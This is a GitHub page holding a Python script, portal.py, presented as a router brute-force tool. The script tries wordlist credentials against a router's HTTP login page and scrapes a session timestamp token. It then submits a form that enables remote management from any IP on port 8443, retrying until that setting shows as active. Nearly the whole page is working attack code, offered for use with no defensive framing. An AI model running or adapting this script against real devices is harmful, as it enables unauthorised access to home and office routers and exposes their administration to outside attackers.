-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathportal.py
156 lines (123 loc) · 4.43 KB
/
portal.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
import requests
import re
import time
import argparse
parser = argparse.ArgumentParser(description='PORTAL - Router Bruteforce Tool')
parser.add_argument('ip', type=str, help='ip address of target router')
args = parser.parse_args()
target_ip = args.ip
user_names = []
passwords = []
f = open('users.txt','r')
data = f.readlines()
user_names = [user.strip() for user in data]
f = open('passwords.txt','r')
data = f.readlines()
passwords = [password.strip() for password in data]
print 'Loaded users: {}'.format(user_names)
print 'Loaded passwords: {}'.format(passwords)
# Maximum number of times to try enable remote management
max_attempts = 10
target_page = 'FW_remote.htm'
rmport = 8443
# Headers
pragma = 'no-cache'
accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
acceptlang = 'en-us'
acceptenc = 'gzip, deflate'
contenttype = 'application/x-www-form-urlencoded'
origin = 'http://192.168.1.1'
ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15'
uir = '1'
ref = 'http://{}/{}'.format(target_ip, target_page)
headers = {
'Pragma': pragma,
'Accept': accept,
'Accept-Language': acceptlang,
'Cache-Control': "no-cache",
'Accept-Encoding': acceptenc,
'Content-Type': contenttype,
'Origin': origin,
'User-Agent': ua,
'Upgrade-Insecure-Requests': uir,
'Referer': ref,
}
# Get timestamp token and verify credentials
timestamp = None
verified_user = None
verified_pass = None
for user in user_names:
for password in passwords:
url = 'http://{}:{}@{}/{}'.format(user, password, target_ip, target_page)
print '[-] Trying: {}'.format(url)
r = requests.get(url)
if r.status_code == 200 and '401 Authorization' not in r.text:
print '[+] Found correct user and password: {}:{}'.format(user, password)
verified_user = user
verified_pass = password
# print '[-] Searching for timestamp in: {}'.format(r.text)
m = re.search('timestamp=(.*)\"', r.text)
if m:
timestamp = int(m.group(1))
print '[+] Found timestamp: {}'.format(timestamp)
break
time.sleep(0.2)
if verified_user and verified_pass:
break
if not verified_user and not verified_pass:
print '[!] Could not find router credentials.'
exit()
if not timestamp:
print '[!] Could not find timestamp token value.'
exit()
def enable_rm():
page = 'apply.cgi?/FW_remote.htm%20timestamp={}'.format(timestamp)
url = 'http://{}:{}@{}/{}'.format(verified_user, verified_pass, target_ip, page)
data = {
'submit_flag': 'remote',
'http_rmenable': '1',
'local_ip': '...',
'remote_mg_enable': '0',
'rm_access': 'all',
'http_rmport': str(rmport)
}
print '[-] Attempting to enable remote management'
print '[-] Request data: {}'.format(data)
return requests.post(url, headers=headers, data=data)
r = enable_rm()
if r.status_code == 200:
print '[+] Successfully submitted request'
def verify_rm():
page = 'FW_remote.htm'
url = 'http://{}:{}@{}/{}'.format(verified_user, verified_pass, target_ip, page)
print '[-] Verifying remote management is enabled'
r = requests.get(url)
if r.status_code == 200:
m = re.search('var remote_access=\'(.*)\';', r.text)
pt = re.search('var remote_port=\"(.*)\";', r.text)
ip = re.search('var remote_manage_ip=\"(.*)\";', r.text)
remote_management = m.group(1)
remote_port = pt.group(1)
remote_ip = ip.group(1)
# print '[+] Found remote_management variable: {}'.format(remote_management)
if remote_management == '2':
print '[+] Remote management: Enabled'
print '[+] Remote IP: {}'.format(remote_ip)
print '[+] Remote port: {}'.format(remote_port)
return True
if remote_management == '0':
print '[+] Remote management: Disabled'
return False
else:
print '[+] Remote management: Unknown'
return False
attempts = max_attempts
while not verify_rm():
attempts = attempts - 1
r = enable_rm()
if r.status_code == 200:
print '[+] Successfully enabled remote management at port: {}'.format(rmport)
else:
print '[+] Remote management not enabled. (attempts remaining: {})'.format(attempts)
if attempts == 0:
break